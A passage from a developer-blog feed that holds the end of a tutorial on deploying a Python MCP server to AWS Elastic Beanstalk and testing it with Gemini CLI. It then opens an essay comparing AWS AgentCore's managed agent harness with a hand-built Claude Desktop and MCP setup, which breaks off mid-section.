&lt;p&gt;&lt;a href="https://github.com/modelcontextprotocol/python-sdk" rel="noopener noreferrer"&gt;GitHub - modelcontextprotocol/python-sdk: The official Python SDK for Model Context Protocol servers and clients&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The most common MCP Python deployment path uses the FASTMCP library:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://gofastmcp.com/getting-started/welcome" rel="noopener noreferrer"&gt;Welcome to FastMCP - FastMCP&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Docker Version Management
&lt;/h4&gt;

&lt;p&gt;The AWS Cli tools and Lightsail extensions need current version of Docker. If your environment does not provide a recent docker tool- the Docker Version Manager can be used to downlaod the latest supported Docker:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://howtowhale.github.io/dvm/install.html" rel="noopener noreferrer"&gt;Install&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Amazon Elastic Bean Stalk
&lt;/h4&gt;

&lt;p&gt;AWS Elastic Beanstalk is a Platform-as-a-Service (PaaS) used for deploying and scaling web applications and services into the &lt;a href="https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html" rel="noopener noreferrer"&gt;Amazon Web Services (AWS) Cloud&lt;/a&gt;. [&lt;a href="https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html" rel="noopener noreferrer"&gt;1&lt;/a&gt;, &lt;a href="https://www.geeksforgeeks.org/devops/introduction-to-aws-elastic-beanstalk/" rel="noopener noreferrer"&gt;2&lt;/a&gt;]&lt;/p&gt;

&lt;p&gt;It simplifies the development process by allowing you to upload your application code while the service automatically manages the complex infrastructure details.&lt;/p&gt;

&lt;p&gt;More details are here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://aws.amazon.com/elasticbeanstalk/?trk=a19b69e7-8662-424a-ac1b-3e5f0e4c91a8&amp;amp;sc_channel=ps&amp;amp;ef_id=Cj0KCQjwk_bPBhDXARIsACiq8R0I-AqWs0x0mR8WGk5urYYwySiGzG5YcEaNwwB1pRQUZzZS_VOaUJ4aAkLFEALw_wcB:G:s&amp;amp;s_kwcid=AL!4422!3!795794191909!e!!g!!what%20is%20elastic%20beanstalk!23527793966!192204323946&amp;amp;gad_campaignid=23527793966&amp;amp;gbraid=0AAAAADjHtp-EpX3b2rsVjctzFISpDb0R8&amp;amp;gclid=Cj0KCQjwk_bPBhDXARIsACiq8R0I-AqWs0x0mR8WGk5urYYwySiGzG5YcEaNwwB1pRQUZzZS_VOaUJ4aAkLFEALw_wcB" rel="noopener noreferrer"&gt;Web App Deployment - AWS Elastic Beanstalk - AWS&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The EBS console looks similar to this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3l8z6kgyhj54ot6dg0x3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3l8z6kgyhj54ot6dg0x3.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  AWS CLI
&lt;/h4&gt;

&lt;p&gt;The AWS CLI provides a command line tool to directly access AWS services from your current environment. Full details on the CLI are available here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-install-software.html" rel="noopener noreferrer"&gt;Install Docker, AWS CLI, and the Lightsail Control plugin for containers&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Where do I start?
&lt;/h4&gt;

&lt;p&gt;The strategy for starting MCP development is a incremental step by step approach.&lt;/p&gt;

&lt;p&gt;First, the basic development environment is setup with the required system variables, and a working Gemini CLI configuration.&lt;/p&gt;

&lt;p&gt;Then, a minimal Hello World Style Python MCP Server is built with HTTP transport. This server is validated with Gemini CLI in the local environment.&lt;/p&gt;

&lt;p&gt;This setup validates the connection from Gemini CLI to the local process via MCP. The MCP client (Gemini CLI) and the Python MCP server both run in the same local environment.&lt;/p&gt;

&lt;p&gt;Next- the MCP server is wrapped in a container with docker and deployed to Amazon Elastic Beanstalk. This remote deployment is validated with Gemini CLI running as a MCP client.&lt;/p&gt;

&lt;h4&gt;
  
  
  Setup the Basic Environment
&lt;/h4&gt;

&lt;p&gt;At this point you should have a working Python interpreter and a working Gemini CLI installation. The next step is to clone the GitHub samples repository with support scripts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; ~
git clone https://github.com/xbill9/gemini-cli-aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then run &lt;strong&gt;init.sh&lt;/strong&gt; from the cloned directory.&lt;/p&gt;

&lt;p&gt;The script will attempt to determine your shell environment and set the correct variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;gemini-cli-aws
&lt;span class="nb"&gt;source &lt;/span&gt;init.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If your session times out or you need to re-authenticate- you can run the &lt;strong&gt;set_env.sh&lt;/strong&gt; script to reset your environment variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;gemini-cli-aws
&lt;span class="nb"&gt;source &lt;/span&gt;set_env.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Variables like PROJECT_ID need to be setup for use in the various build scripts- so the set_env script can be used to reset the environment if you time-out.&lt;/p&gt;

&lt;h4&gt;
  
  
  Hello World with HTTP Transport
&lt;/h4&gt;

&lt;p&gt;One of the key features that the standard MCP libraries provide is abstracting various transport methods.&lt;/p&gt;

&lt;p&gt;The high level MCP tool implementation is the same no matter what low level transport channel/method that the MCP Client uses to connect to a MCP Server.&lt;/p&gt;

&lt;p&gt;The simplest transport that the SDK supports is the stdio (stdio/stdout) transport — which connects a locally running process. Both the MCP client and MCP Server must be running in the same environment.&lt;/p&gt;

&lt;p&gt;The HTTP transport allows the MCP client and server to run in the same environment or distributed over the Internet.&lt;/p&gt;

&lt;p&gt;The connection over HTTP will look similar to this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;mcp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;transport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;0.0.0.0&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Running the Python Code
&lt;/h4&gt;

&lt;p&gt;First- switch the directory with the Python MCP sample code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; ~/gemini-cli-aws/mcp-ebs-python-aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Refresh the AWS credentials:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ebs-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;aws login &lt;span class="nt"&gt;--remote&lt;/span&gt;
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ebs-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;source &lt;/span&gt;save-aws-creds.sh 
&lt;span class="go"&gt;Exporting AWS credentials...
Successfully saved credentials to .aws_creds
The Makefile will now automatically use these for deployments.
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run the deploy version on the local system:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ebs-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make deploy
&lt;span class="go"&gt;Creating Lightsail instance mcp-vps-python-aws...
Instance already exists or creation in progress.
Waiting for instance mcp-vps-python-aws to reach 'running' state...
Instance is running.

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can validate the final result by checking the messages:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;  Environment Status: mcp-server-eb-env
   * Status: Ready
   * Health: Green
   * Platform: Docker running on 64bit Amazon Linux 2/4.8.2
   * Deployed Version: app-260508_165941877951
   * CNAME: mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com

  Recent Events
  The environment was recently created and updated successfully:
   * 20:56:10: createEnvironment started.
   * 20:59:32: Initial instance deployment completed.
   * 20:59:38: Successfully launched environment.
   * 21:00:03: Subsequent instance deployment completed successfully.

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can then get the endpoint:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt; &amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make endpoint
&lt;span class="go"&gt;
  Retrieving Application Endpoint: Retrieving the public endpoint URL of the Elastic Beanstalk environment.

╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ ✓ Shell make endpoint │
│ │
│ http://mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

✦ The public endpoint for your Elastic Beanstalk environment is:

  http://mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The service will be visible in the AWS console:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx87hrzizoj7hg847eh82.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx87hrzizoj7hg847eh82.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Gemini CLI settings.json
&lt;/h4&gt;

&lt;p&gt;Once you have the deployed endpoint — update the Gemini CLI MCP settings:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"mcp-ebs-python-aws"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"httpUrl"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"http://mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com/mcp/"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Remote MCP Server Testing
&lt;/h4&gt;

&lt;p&gt;Restart Gemini CLI and check for the new MCP tools:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ebs-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;gemini
&lt;span class="go"&gt;
 ▝▜▄ Gemini CLI v0.41.2
   ▝▜▄
  ▗▟▀ Signed in with Google /auth
 ▝▀ Plan: Gemini Code Assist Standard /upgrade

🟢 mcp-ebs-python-aws - Ready (1 tool)
  Tools:
  - mcp_mcp-ebs-python-aws_greet

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then the remote MCP tool in EBS can be called:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt; &amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;mcp_mcp-ebs-python-aws_greet Hello Beanstalk!
&lt;span class="go"&gt;
  Topic: Executing the greet tool to verify the MCP server functionality.

╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ ✓ greet (mcp-ebs-python-aws MCP Server) {"param":"Hello Beanstalk!"} │
│ │
│ Hello, Hello Beanstalk!! │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

✦ Hello, Hello Beanstalk!!
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Gemini CLI can also summarize the deployment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; summarize the deployment

✦ The mcp-ebs-python-aws project is a Python-based Model Context Protocol (MCP) server deployed to AWS Elastic Beanstalk (EB) using Docker.

  Deployment Architecture
   * Server Framework: Built with FastMCP and Starlette, providing an asynchronous foundation for MCP tools and standard HTTP endpoints.
   * Infrastructure: Uses the Elastic Beanstalk Docker platform, which automatically handles capacity provisioning, load balancing, and
     auto-scaling.
   * Compute: Defaults to t3.micro instances in the us-east-1 region.

  Deployment Workflow (make deploy)
  The deployment is automated via a Makefile and deploy.sh script:
   1. Validation: Runs unit tests using pytest to ensure code quality before deployment.
   2. Initialization: Uses the EB CLI (eb init) to configure the project for the AWS Docker platform.
   3. Provisioning: Creates the environment (eb create) if it doesn't exist, setting up the required AWS resources (ALB, ASG, EC2).
   4. Updates: Deploys code changes (eb deploy), which triggers a Docker build and rolling update on the EB instances.

  Key Endpoints
  Once deployed, the environment provides:
   * MCP SSE Transport: http://&amp;lt;eb-cname&amp;gt;/mcp
   * Health Check: http://&amp;lt;eb-cname&amp;gt;/health (used by EB for monitoring)
   * Root Info: http://&amp;lt;eb-cname&amp;gt;/

  Management Commands
   * make status: Displays the current health of the EB environment and recent deployment events.
   * make endpoint: Retrieves the public URL of the deployed server.
   * make aws-destroy: Terminates the environment and all associated AWS resources to stop billing.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Summary
&lt;/h4&gt;

&lt;p&gt;The strategy for using Python for MCP development with Gemini CLI on Amazon EBS was validated with a incremental step by step approach.&lt;/p&gt;

&lt;p&gt;This MCP server was then deployed to Amazon Elastic Bean Stalk. The local copy of Gemini CLI was used as a MCP client to validate the connection.&lt;/p&gt;

&lt;p&gt;This approach can be extended to more complex deployments using other MCP transports and Cloud based options.&lt;/p&gt;

</description>
      <category>agents</category>
      <category>elasticbeanstalk</category>
      <category>mcps</category>
      <category>gemini</category>
    </item>
    <item>
      <title>What AgentCore Managed Harness Takes Over, What It Leaves to You</title>
      <dc:creator>Kento IKEDA</dc:creator>
      <pubDate>Fri, 08 May 2026 21:03:13 +0000</pubDate>
      <link>https://dev.to/aws-builders/what-agentcore-managed-harness-takes-over-what-it-leaves-to-you-1je6</link>
      <guid>https://dev.to/aws-builders/what-agentcore-managed-harness-takes-over-what-it-leaves-to-you-1je6</guid>
      <description>&lt;p&gt;On April 22, 2026, AWS added a "managed agent harness" (preview) to Amazon Bedrock AgentCore. With this feature, you declare the model, system prompt, and tools as configuration, and the agent runs—the orchestration code lives on the AWS side as managed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://aws.amazon.com/blogs/machine-learning/get-to-your-first-working-agent-in-minutes-announcing-new-features-in-amazon-bedrock-agentcore/" rel="noopener noreferrer"&gt;https://aws.amazon.com/blogs/machine-learning/get-to-your-first-working-agent-in-minutes-announcing-new-features-in-amazon-bedrock-agentcore/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What stands out about this release is less the feature itself and more AWS's adoption of the term "agent harness." Since Martin Fowler wrote his harness engineering essay in February 2026, Anthropic and OpenAI have started using "harness" officially, and now a cloud vendor has applied the same word to its own service.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://martinfowler.com/articles/harness-engineering.html" rel="noopener noreferrer"&gt;https://martinfowler.com/articles/harness-engineering.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the perspective of someone who has been assembling a harness by hand, the question becomes: what does managed harness take over, and what stays in my hands? This article sorts out that dividing line. Drawing on experience running business-automation agents with Claude Desktop, multiple MCP servers, and Markdown-based knowledge, I lay out the correspondence with AgentCore managed harness.&lt;/p&gt;

&lt;p&gt;A few "tried it out" articles have already been published, so this article positions itself as the prequel: it offers material for deciding whether to adopt, not adopt, or how to phase in. Drawing on the official blog, documentation, and existing explanatory articles as sources, I sort out the correspondence and the judgment criteria that emerge from self-built operation.&lt;/p&gt;

&lt;h2&gt;
  
  
  AWS released "managed harness"
&lt;/h2&gt;

&lt;p&gt;The official blog mentioned above lays out the structure: every agent has an orchestration layer, and running that layer requires compute, a sandbox to safely execute code, tool connections, persistent storage, and error recovery as the underlying infrastructure—bundled together, they form the agent harness. Managed harness is AWS providing this harness as a managed offering, where the user declares the model, system prompt, and tools as configuration, and a working agent is the result.&lt;/p&gt;

&lt;p&gt;Let me first align on what the word "harness" refers to. The term gets used both for what the vendor builds in (internal) and for what the user assembles around the agent (external), and the meaning shifts with context. In addition to Fowler's framing, watany has organized the internal/external confusion in a Zenn article.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://zenn.dev/watany/articles/d8b692bbca65a3" rel="noopener noreferrer"&gt;https://zenn.dev/watany/articles/d8b692bbca65a3&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This article is written from the position of "someone who has been assembling the external environment by hand"—the user-side harness, in operation. AgentCore managed harness can be read as the vendor-side internal harness now offered as managed, but from the user's perspective, it can also be read as: part of what we used to build for ourselves can now be delegated. This duality is the starting point for thinking about where responsibilities split with self-built operation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Self-built harness composition, the four blank layers
&lt;/h2&gt;

&lt;p&gt;Let me map my self-built harness to AgentCore's components. The environment I've been operating consists, broadly, of three elements, and I'll lay out how each one corresponds to something on the AgentCore side.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Self-built harness&lt;/th&gt;
&lt;th&gt;AgentCore side&lt;/th&gt;
&lt;th&gt;Degree of correspondence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Markdown knowledge files (under &lt;code&gt;agents/&lt;/code&gt;, &lt;code&gt;knowledge/&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;AgentCore Memory&lt;/td&gt;
&lt;td&gt;Similar role; persistence and retrieval mechanisms differ&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MCP servers (task management / calendar / chat / document management, etc.)&lt;/td&gt;
&lt;td&gt;AgentCore Gateway&lt;/td&gt;
&lt;td&gt;MCP is becoming the standard, so they're close&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Claude Desktop&lt;/td&gt;
&lt;td&gt;AgentCore Runtime&lt;/td&gt;
&lt;td&gt;The execution base for the agent loop, at a different scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;AgentCore Identity&lt;/td&gt;
&lt;td&gt;Not implemented in self-built&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;AgentCore Policy&lt;/td&gt;
&lt;td&gt;Not implemented in self-built&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;AgentCore Observability&lt;/td&gt;
&lt;td&gt;Not implemented in self-built&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;AgentCore Evaluations&lt;/td&gt;
&lt;td&gt;Not implemented in self-built&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The top three are the correspondence between "what I assembled by hand" and "what AgentCore provides as managed for the same role." The bottom four are blank layers in the self-built harness—components AgentCore offers that aren't covered by my operation.&lt;/p&gt;

&lt;p&gt;The natural question here is whether these four blank layers are "things I didn't write because I didn't need them" or "things I wanted but had given up on." The two are different. For the former, introducing managed harness yields little value; for the latter, it brings value.&lt;/p&gt;

&lt;p&gt;Let me go through the four layers in order.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Identity&lt;/strong&gt; is for managing authentication and permissions when multiple users access the agent. Since my self-built harness runs on a personal device, authentication can rely on the device login, and per-agent authentication wasn't necessary. This is unnecessary "as long as it's just me." The moment you try to share an agent across an organization, controlling who can call which MCP for what becomes a problem, and the gap surfaces in the form of resignation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Policy&lt;/strong&gt; is the mechanism for declaratively defining boundaries when the agent calls tools. It's based on Cedar, AWS's open-source policy language, and you can generate policies from natural language. In my self-built harness, I draw loose boundaries through MCP server scopes and by documenting "what not to do" in the knowledge files—but this is discipline, not enforcement. I had wanted to write strong, enforceable boundaries, but didn't have the motivation to build a Cedar-equivalent system myself, so I had given up on this area.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Observability&lt;/strong&gt; is the mechanism for emitting agent execution logs, traces, and metrics to CloudWatch for visualization. In my self-built harness, I have the conversation history in Claude Desktop and individual logs from each MCP server, but no mechanism to track "which agent called what when, and how it failed" across the board. For solo use, looking at the chat screen suffices, but this becomes necessary in organizational deployment, and falls into the resignation category.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Evaluations&lt;/strong&gt; is the mechanism for continuously evaluating the agent's response quality, with built-in evaluators for dimensions like helpfulness, tool-selection accuracy, and correctness. In my self-built harness, I check subjectively through knowledge-file improvement history and daily work logs, but I have no quantitative quality monitoring. For solo use, subjective is enough; but for organizational operation or paid services, this becomes essential.&lt;/p&gt;

&lt;p&gt;Looking back at the four layers, only Identity falls into "unnecessary as long as it's just me," while the other three fall into "would have been nice, but had given up on as self-built." The fact that the meaning of "blank" differs by layer affects the judgment of whether to adopt managed harness.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layers managed harness takes over, layers it leaves
&lt;/h2&gt;

&lt;p&gt;When you use managed harness, what stops being something you write, and what continues to require writing? This can be derived as fact from the official blog and documentation, so let me sort it out first.&lt;/p&gt;

&lt;p&gt;What managed harness takes over is the following range:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The agent loop: calling the model, selecting tools, returning results, managing context, and recovering from errors&lt;/li&gt;
&lt;li&gt;A microVM, filesystem, and shell isolated per session&lt;/li&gt;
&lt;li&gt;Tool-connection orchestration via AgentCore Gateway&lt;/li&gt;
&lt;li&gt;The framework portion based on Strands Agents&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Conversely, what users still need to write even when using managed harness is the following range:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Which model to use&lt;/li&gt;
&lt;li&gt;What to write in the system prompt&lt;/li&gt;
&lt;li&gt;Which tools to make callable&lt;/li&gt;
&lt;li&gt;What goes into AgentCore Memory and what doesn't&lt;/li&gt;
&lt;li&gt;What boundaries to declare in AgentCore Policy&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Since declaration-based configuration suffices, the amount of code drops significantly. However, the five items above are simply "what you write as configuration changes"—the judgments themselves don't go away. They just shift into the form of the &lt;code&gt;harness.json&lt;/code&gt; configuration file. Reading preview validation articles by people who have actually tried managed harness, you'll see that &lt;code&gt;harness.json&lt;/code&gt; lists the model and tool list as declarations, while a separate &lt;code&gt;system-prompt.md&lt;/code&gt; file holds the system prompt.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.classmethod.jp/articles/bedrock-agentcore-managed-harness-preview/" rel="noopener noreferrer"&gt;https://dev.classmethod.jp/articles/bedrock-agentcore-managed-harness-preview/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/aws-samples/sample-AgentCore-Managed-Harness-News" rel="noopener noreferrer"&gt;https://github.com/aws-samples/sample-AgentCore-Managed-Harness-News&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This looks like what was previously written as Markdown system-prompt files and MCP connection definitions in the self-built harness, repackaged into AWS's configuration file format.&lt;/p&gt;

&lt;p&gt;In other words, what managed harness takes over is "the labor of writing orchestration code," not "the judgment of designing the agent." Design judgments still rest with the user. AWS expresses this as removing the infrastructure barrier, but the non-infrastructure part—"what is this agent for, and how far should it be allowed to go"—remains on the human side, whether it's managed or self-built.&lt;/p&gt;

&lt;p&gt;This distinction is an important perspective when judging whether to adopt managed harness. The pitch "you don't have to write code" is accurate, but reading it as "you don't have to think" makes it inaccurate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where self-built operation can articulate "the place of design judgments"
&lt;/h2&gt;

&lt;p&gt;When you operate a self-built harness, you accumulate judgments about "where it's okay to move things, and where you must not." These don't go away when you adopt managed harness. The place where they appear shifts to the contents of &lt;code&gt;harness.json&lt;/code&gt;, but the judgments themselves continue to rest on the human side. Let me name a few representative ones.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Knowledge file granularity.&lt;/strong&gt; Whether to split your Markdown knowledge "by role" or "by task" is a judgment that, once made, eases subsequent operation. Splitting by role lets agent dispatch fall naturally out of context. Splitting by task scatters cross-task knowledge. There's no simple winner; the optimum depends on the number of agents you operate and how tasks overlap. Even with managed harness, the same question—what to combine in Memory and what to separate—remains.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;MCP server combination design.&lt;/strong&gt; This is the line between "how far to wire up as tools via MCP" and "how far to handle through local file operations." For example, task management is better suited to MCP via API for automation, while sensitive tasks are safer kept as local file operations—judgments that emerge through use. Managed harness's Gateway has to answer the same question, just translated into declarations in a tool list.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent-to-agent responsibility split.&lt;/strong&gt; This is the design choice between having a coordinator agent that judges context and dispatches to specialist agents, or calling specialist agents directly from the start. The coordinator style depends on context-judgment accuracy; the direct-call style puts the discrimination burden on the user. This too remains as a design judgment in managed harness, in the form of how to arrange and connect multiple harnesses.&lt;/p&gt;

&lt;p&gt;These three are judgments that are hard to articulate without operating self-built first. If you start from managed harness, these judgments end up looking "as if they were optimally placed from the beginning." In reality, you've just fixed the premises, but inside fixed premises, the existence of design judgments themselves becomes harder to see.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why not just use managed harness from the start?
&lt;/h3&gt;

&lt;p&gt;Here's a counterargument I anticipate: "If we just use managed harness from the start, we won't need to build anything ourselves."&lt;/p&gt;

